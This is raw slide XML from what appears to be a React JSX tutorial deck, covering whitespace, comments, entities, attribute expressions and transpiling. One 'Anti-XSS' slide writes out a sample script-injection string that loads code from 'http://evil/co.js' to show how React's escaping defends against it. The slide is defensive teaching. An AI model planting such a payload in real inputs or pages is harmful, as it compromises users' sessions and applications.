              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;/h1&gt;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8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&lt;h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>{1}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>plus</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>{2}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>{3}</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>&lt;/h1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>you end up with</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;h1&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>plus</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>is</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;&lt;span&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="sv-SE" b="1" dirty="0"/>
              <a:t>&lt;/span&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>&lt;/h1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sz="2800" dirty="0"/>
              <a:t>As you can see all the whitespace is trimmed, so and the end result is “1plus2is3”.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09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Comments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Since </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>the {} expressions are just JavaScript, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>add multi-line </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>comments using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>/* comment */.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You </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>can also add single-line comments using // </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>comment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70136"/>
            <a:ext cx="4961364" cy="40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700" dirty="0" smtClean="0"/>
              <a:t>JSX is convenient </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>XML-based extension to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>JavaScript to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>build the component tree as a set of XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>nodes</a:t>
            </a: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-US" sz="2700" dirty="0"/>
              <a:t>to visualize </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>DOM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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>JSX </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>simplifies the association of event-handlers and properties as xml attributes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r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0"/>
              <a:t>JSX XML node maps directly to a Component</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2700" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/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- Gotchas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HTML entities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>Use HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>entities in JSX like so:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>&lt;h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>More info </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>&amp;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" err="1"/>
              <a:t>raquo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0"/>
              <a:t>&lt;/h2&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>This examples produces a “right-angle quote”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6705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1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44603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Anti-XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>escapes all strings in order to prevent a class of XSS (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" i="1" dirty="0"/>
              <a:t>Cross-site scripting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>) attacks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So when you ask the user to give  some input </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>and they provide a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>string, React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>protects you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var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‘Sri&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt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FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="http://evil/co.js"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>scr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>'+'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ipt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&gt;';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If you naively write this input into the DOM, like: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('app').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firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>i. then this is a disaster because the page will say </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>“Sri”, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>but the &lt;script&gt; tag will </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>load a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>malicious JavaScript and compromise your app.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0668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JSX will infer the class's </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>displayName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> from the variable assignment when the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>displayName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is undefined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Nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>React.createClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>({ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>});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Nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>React.createClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>({</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>displayName</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>: "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>", }); 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365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44603"/>
            <a:ext cx="8763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Anti-XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>React protects you from cases like this out of the box. If you do:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>React.render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&lt;h2&gt;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Hello {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rgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>}!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&lt;/h2&gt;,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>document.getElementById</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>('app')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dirty="0" smtClean="0"/>
              <a:t>then </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>React escapes the content of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>firstname</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t> and the page displays “</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Hello Sri&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>="http://evil/co.js"&gt;&lt;/script&gt;!”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523367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Transform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React JSX transforms from an XML-like syntax into native JavaScript.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XML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>elements, attributes and children are transformed into arguments that are passed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1" smtClean="0"/>
              <a:t>React.createElement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Nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>;// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Input (JSX</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>):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app = &lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> color="blue" /&gt;;// Output (JS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>):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app = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>React.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>Nav</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>, {</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>color:"blue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>"});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27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JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expressions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Attribute Expressions</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>To use a JavaScript expression as an attribute value, wrap the expression in a pair of curly braces ({}) instead of quotes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>("").</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2800" dirty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person = </a:t>
            </a:r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/>
              <a:t>Person name={</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>window.isLoggedIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> ? window.name : ''} </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>/&gt;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person = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>React.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>(  Person, 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{</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1"/>
              <a:t>window.isLoggedIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> ? window.name : ''});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906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-18288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68534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12225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12225"/>
            <a:ext cx="8257308" cy="484909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JSX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367"/>
            <a:ext cx="9220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JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Expressions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Boolean Attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>Omitting the value of an attribute causes JSX to treat it as true. To pass false an attribute expression must be used.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// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>These two are equivalent in JSX for disabling a </a:t>
            </a:r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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input type="button" disabled </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;;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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input type="button" disabled={true} /&gt;; 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800" dirty="0" smtClean="0"/>
              <a:t>// </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>And these two are equivalent in JSX for not disabling a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>button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>
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input type="button" </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/&gt;;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&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>input type="button" disabled={false} /&gt;;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600" dirty="0"/>
              <a:t>// render without JSX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>React.createElement</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>("div",</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>null,</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>"Hello React World!"));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"With JSX, it looks much better."</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>// render with JSX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return &lt;div&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>Hello React World</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;/div&gt;;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Why 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019" y="658585"/>
            <a:ext cx="8762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experiment and get familiar with the JSX transforms, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>play with the live </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>editor at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514600"/>
            <a:ext cx="71628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://babeljs.io/repl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4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019" y="658585"/>
            <a:ext cx="925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below link for transitioning an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>app’s markup from HTML: an HTML-to-JSX transformer </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>facebook.github.io/react/html-jsx.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>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0" y="2743200"/>
            <a:ext cx="8991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5611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Transpiling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> JSX</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2800" smtClean="0"/>
              <a:t>Transpilation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>is a process of taking source code and rewriting it to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>work the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>same but using syntax that’s understood by older browsers.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It’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>different than </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" smtClean="0"/>
              <a:t>using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>polyfills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JSX – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>0.15.x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48311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9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HTML tags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React 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762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" y="762000"/>
            <a:ext cx="861059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“HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>tags start with a lowercase letter </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and React </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>components start with an uppercase letter." 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// Specifying HTML tags</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>render: function(){</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>return(&lt;table </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>className</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = 'table'&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>.....</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>&lt;/table</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" smtClean="0"/>
              <a:t>&gt;); }</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/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// Specifying React components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App</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>React.createClass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>({..});</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0" err="1"/>
              <a:t>ReactDOM.render</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
              <a:t>(&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>App</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2600" dirty="0"/>
